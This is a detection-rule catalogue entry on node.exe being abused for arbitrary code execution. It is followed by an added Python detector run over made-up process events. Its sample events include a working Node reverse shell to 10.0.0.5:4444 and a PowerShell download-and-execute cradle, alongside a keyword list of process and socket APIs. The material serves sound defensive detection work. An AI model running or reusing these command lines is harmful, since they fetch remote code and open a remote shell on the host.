
Potential Arbitrary Code Execution Via Node.EXE (6640f31c-01ad-49b5-beb5-83498a5cd8bd)

Detects the execution of node.exe, which ships bundled with multiple software products such as VMware and Adobe, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks.

Cluster A | Galaxy A | Cluster B | Galaxy B | Level
Potential Arbitrary Code Execution Via Node.EXE (6640f31c-01ad-49b5-beb5-83498a5cd8bd) | Sigma-Rules | Trusted Developer Utilities Proxy Execution - T1127 (ff25900d-76d5-449b-a351-8824e62fc81b) | Attack Pattern | 1
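The description above gives the idea behind the rule but not the selection logic. The following is an added example of such a detection run over constructed process-creation events; it is not the Sigma rule's own selection and not code from the MISP galaxy or the SigmaHQ project. The field names (Image, CommandLine, ParentImage, modelled on Sysmon Event ID 1), the inline-execution switches and the API strings it keys on are assumptions chosen to illustrate the reverse-shell pattern the description mentions, and the sample events are made up.

```python
"""Added example: flag node.exe being used as an inline code launcher.

Not the Sigma rule's real selection; field names and match terms are assumptions.
"""
import ntpath
import re

# Constructed sample events in a Sysmon EID 1 style (assumed field names); not real telemetry.
SAMPLE_EVENTS = [
    {   # benign: vendor-bundled node.exe running the vendor's own script file
        "Image": r"C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe",
        "CommandLine": r'''"C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe" "C:\Program Files\Adobe\Adobe Creative Cloud Experience\js\main.js"''',
        "ParentImage": r"C:\Program Files\Adobe\Adobe Creative Cloud Experience\Creative Cloud.exe",
    },
    {   # suspicious: inline JavaScript spawning a PowerShell download cradle from a vendor node.exe
        "Image": r"C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe",
        "CommandLine": r'''"C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe" -e "require('child_process').exec('powershell.exe -nop -w hidden -c iex(iwr http://10.0.0.5/p.ps1)')"''',
        "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
    },
    {   # suspicious: classic Node reverse shell over net.Socket via --eval
        "Image": r"C:\Users\Public\node.exe",
        "CommandLine": r'''node.exe --eval "var n=require('net'),c=require('child_process'),s=new n.Socket();s.connect(4444,'10.0.0.5',function(){var p=c.spawn('cmd.exe');s.pipe(p.stdin);p.stdout.pipe(s);})"''',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # not node.exe at all: must never match even though the command line has -e
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe -e",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# Switches that make node execute code given on the command line instead of a script
# file, and APIs typically needed to turn that into a shell or a socket (assumed terms).
INLINE_SWITCHES = re.compile(r"\s(-e|--eval|-p|--print)(\s|=|$)", re.IGNORECASE)
SUSPICIOUS_APIS = ("child_process", ".exec(", ".spawn(", "execsync(", "net.socket", ".connect(")


def is_node_abuse(event: dict) -> bool:
    """True when node.exe runs inline code that also reaches for a process or network API."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "node.exe":
        return False
    cmd = event.get("CommandLine", "")
    has_inline_code = INLINE_SWITCHES.search(cmd) is not None
    has_suspicious_api = any(tok in cmd.lower() for tok in SUSPICIOUS_APIS)
    # Both conditions are required so that `node -e "console.log(1)"` style
    # one-liners and plain script execution do not fire on their own.
    return has_inline_code and has_suspicious_api


def detect(events):
    """Return the indices of events that match the abuse pattern."""
    return [i for i, ev in enumerate(events) if is_node_abuse(ev)]


if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"ALERT: {ev['ParentImage']} -> {ev['Image']}\n  {ev['CommandLine']}")
```

Because vendor copies of node.exe (Adobe Creative Cloud, VMware Horizon and others) legitimately run their own script files all day, keying on the image name alone is noisy; the example therefore requires an inline-execution switch together with a process or socket API in the same command line. Tune the API list and add parent-process or path exclusions for your environment, and compare against the current rule in the SigmaHQ repository, since its selection may differ from the assumptions here.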